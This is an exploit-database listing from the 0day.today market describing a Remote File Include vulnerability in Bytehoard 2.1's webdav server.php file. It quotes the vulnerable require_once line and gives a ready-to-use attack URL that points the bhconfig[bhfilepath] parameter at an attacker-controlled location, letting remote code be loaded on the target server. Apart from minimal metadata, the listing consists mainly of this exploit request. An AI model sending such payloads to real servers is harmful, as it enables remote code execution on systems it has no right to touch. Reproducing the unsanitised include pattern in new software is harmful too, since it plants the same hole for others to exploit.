[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bytehoard 2.1 (server.php) Remote File Include Vulnerability

Author
beford
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-474
Category
web applications
Date add
31-05-2006
Platform
unsorted
============================================================
Bytehoard 2.1 (server.php) Remote File Include Vulnerability
============================================================




Script: Bytehoard 2.1 Epsilon/Delta  www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]


http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker



#  0day.today [2024-11-15]  #